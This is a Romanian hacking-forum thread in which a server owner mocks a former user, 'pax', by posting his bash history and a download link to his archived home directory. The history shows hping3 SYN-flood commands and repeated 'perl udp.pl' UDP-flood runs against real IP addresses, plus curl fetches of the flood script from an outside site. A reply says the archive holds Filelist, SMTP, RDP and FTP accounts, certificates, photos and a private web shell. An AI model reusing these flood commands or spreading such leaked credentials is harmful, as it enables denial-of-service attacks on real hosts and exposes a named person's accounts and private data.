Jump to content
aelius

A fost odata un ratat v 1.0

Recommended Posts

A fost odata un ratat ce cotrobaia pe forum pe aici si il chema pax.

Cu cateva luni in urma, mi-a zis ca nu are si el pe ce sa lucreze la diverse scripturi (php stuff), si avand un morman de servere acasa pe care lucrez, fac teste, benchmark-uri, i-am adaugat un account pe unul din servere.

Aseara ma uitam sa fac ce face ratatul acolo:


hp ~ # w
11:46PM up 8 days, 10:52, 3 users, load averages: 1.67, 1.70, 1.50
USER TTY FROM LOGIN@ IDLE WHAT
root pts/0 workstation Sat09AM - w
root pts/1 workstation 11:36PM 7 -bash (bash)
pax pts/2 89.114.232.245 11:00PM 46 perl udp.pl 93.115.122.233 0 0

M-am uitat prin bash history sa vad ce sloboz face saracia acolo, si in afara de faptul ca "lucra" la cate ceva (stie php cum stia bunica-mea blowjob) am vazut astea:


3293 2011-11-26 21:46:13 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP93.115.122.233
3294 2011-11-26 21:46:15 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
3295 2011-11-26 21:46:18 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
3296 2011-11-26 21:46:52 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source 93.115.122.233
3297 2011-11-26 21:47:02 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233
3298 2011-11-26 21:47:12 sudo hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233
3304 2011-11-26 21:51:48 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048
3305 2011-11-26 21:52:52 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048

3235 2011-11-20 14:55:55 perl udp.pl 78.97.149.15 80 80
3236 2011-11-20 14:56:30 perl udp.pl 78.97.149.15 80 800
3237 2011-11-20 14:57:05 perl udp.pl 78.97.149.15 80 800 &
3238 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 &
3239 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 &
3240 2011-11-20 14:57:10 perl udp.pl 78.97.149.15 80 800 &
3241 2011-11-20 14:57:15 perl udp.pl 78.97.149.15 80 800 &
3242 2011-11-20 14:57:20 perl udp.pl 78.97.149.15 80 800 &

3222 2011-11-20 14:43:55 curl http://lasemafor.ro/udp.pl -O udp
3223 2011-11-20 14:44:05 ls
3224 2011-11-20 14:44:17 curl http://lasemafor.ro/udp.pl -O x
3225 2011-11-20 14:44:24 curl lasemafor.ro/udp.pl -O x
3226 2011-11-20 14:44:28 curl lasemafor.ro/udp.pl -o x
3320 2011-11-27 19:02:56 pl udp.pl 79.112.84.177 0 0
3321 2011-11-27 19:03:01 perl udp.pl 79.112.84.177 0 0
3322 2011-11-27 19:04:32 netstat
3323 2011-11-27 19:04:40 ping 79.112.84.117
3324 2011-11-27 19:06:31 echo plm
3325 2011-11-27 19:06:57 ping google.ro
3326 2011-11-27 19:07:25 ping 89.114.232.245
3327 2011-11-27 19:20:24 ping 79.112.84.117
3328 2011-11-27 23:00:33 perl udp.pl 93.115.122.233 0 0

Si astea: (nu stiu cat de ratat poate sa fie sa de yum/apt-get/aptitude pe un FreeBSD, plus ca era user.)


3257 2011-11-25 13:58:35 yum install htop
3258 2011-11-25 13:58:40 apt-get install htop
3259 2011-11-25 13:58:49 aptitude install htop

Am sters account-ul la trotineta asta cu pedale, i-am arhivat directorul home si l-am pus aici, ca poate sunt necesare la cineva.

www.rstcenter.com/pax.tgz

Poftiti lupii mei, e moca! :))

Link to comment
Share on other sites

Conturi Filelist, SMTP, RDP-uri, FTP, certificate, poze (si cu mine una :)) ) si altele.

Interesant.

Pacat ca "udp.pl", asta e trist...

Destul de trista e si partea cu " 3324 2011-11-27 19:06:31 echo plm". Cred ca s-a scremut tare mult pentru asta :))

PS: Imi place faza:

/*

private !!! private !!! private !!! private !!! private !!! private !!! private !!!

-------------------------------------------------------------------------------------------

-- Do not Distibute This shell

-- Do not Sell This shell

-- Do not give it even to your mother

-- by rgod .

-------------------------------------------------------------------------------------------

private !!! private !!! private !!! private !!! private !!! private !!! private !!!

*/

Deci el tocmai ne-a dat ceva ce nu i-ar da nici lu' masa :))

Edited by bcman
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...